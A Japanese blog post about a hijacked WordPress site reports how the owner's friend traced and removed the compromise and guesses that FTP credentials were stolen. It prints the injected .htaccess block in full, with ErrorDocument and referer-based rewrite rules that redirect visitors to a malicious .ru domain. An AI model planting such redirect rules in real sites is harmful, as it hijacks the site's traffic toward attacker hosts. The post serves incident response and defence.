ワードプレス

20
9月

ハイジャックされたワードプレスサイト

Posted by j-sekino コメントは受け付けていません。


 
当事者には大変失礼ながら、非常に興味津々な状況に立ち会えたので、経緯と解決策をご報告します。
 
・状況
ワードプレスを使ってECサイトを運営している友人より相談あり、自サイトにアクセスしたら、おそロシアへ連れ去られる。
管理画面にログインは出来るが、ダッシュボード上、あらゆるリンクの遷移先が「***.ru」サイトへ向いている。
FTPもログイン出来る。
「***.ru」は検索してもノーヒット。
 
 
・確認内容と作業内容
サーバ内ファイルを日付でソートしたところ、WPディレクトリトップに置かれている「htaccess」が昨日の日付で更新されている。
ファイルを開いたところ、下段に大きく改行かつ、右に大きく改行(頭にスペース)して訳が分からぬ記述あり。
こんな感じです。

ErrorDocument 400 http://jobtectil.ru/systematic/index.php
ErrorDocument 401 http://jobtectil.ru/systematic/index.php
ErrorDocument 403 http://jobtectil.ru/systematic/index.php
ErrorDocument 404 http://jobtectil.ru/systematic/index.php
ErrorDocument 500 http://jobtectil.ru/systematic/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://jobtectil.ru/systematic/index.php [R=301,L]

これらの記述を消して「htaccess」を上書きしましたが、瞬時で書き換えられます。
(削除を選択すると権限なしと弾かれる)
怪しいファイル/フォルダはないかと探したところ、「upgrade」という妙なフォルダを発見。例によってアクセス日付が昨日でした。
中身は目視する限り空でしたが、このフォルダを削除し再度「htaccess」をアップロードしたところ、大成功。
おまじないとして、WPのパスワードとFTPのパスワードを変更。

 
・原因に関する推察
サイトのオーナーの環境は「Microsoft Security Essentials」プラス「FFFTP」を使っています。
ここから完全推察ですが、どこかの怪しいサイトを踏んで「Microsoft Security Essentials」がスルーし、「FFFTP」の脆弱性突かれてトラップ仕込まれたんじゃないでしょうか?
色々検索していたらこういう海外ブログを発見。
Htaccess Redirect to Example.ru/dir/index.php | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2010/10/14/htaccess-redirect-to-example-rudirindex-php-2/
 
状況全く一緒です。この海外ブログの方も「恐らく原因はFTP」と書かれています。
知っている人は知っている通り、GENOウィルス=Gumblarの代名詞的存在となった「FFFTP」は今年(2011年)の8月に作者さんが開発投了されていまして、いわば地雷原をスキップするような状態です。
http://www2.biglobe.ne.jp/~sota/
何を今更かもしれませんが、気になる方は「Gumblar対策」などで検索して下さい。
 
 
・最後に
今回の処理で原因の根本が除去されたのかどうか、当方では分かりません。
FFFTPを窓から投げ捨て、レジストリを掃除し(GumblarはFTPのレジストリ情報を読みに行くそうです)
窓の杜 – 【NEWS】“Gumblar”問題を受け、「FFFTP」のレジストリ設定を削除するツールが公開
http://www.forest.impress.co.jp/docs/news/20100201_346309.html
複数のウィルススキャン、それとマルウェア対策ソフトでスクリーニングする必要があるでしょう。
実行ファイルを仕込まれているのならそれを除去しない限り、同じ事の繰り返しです。

Category : ワードプレス | Blog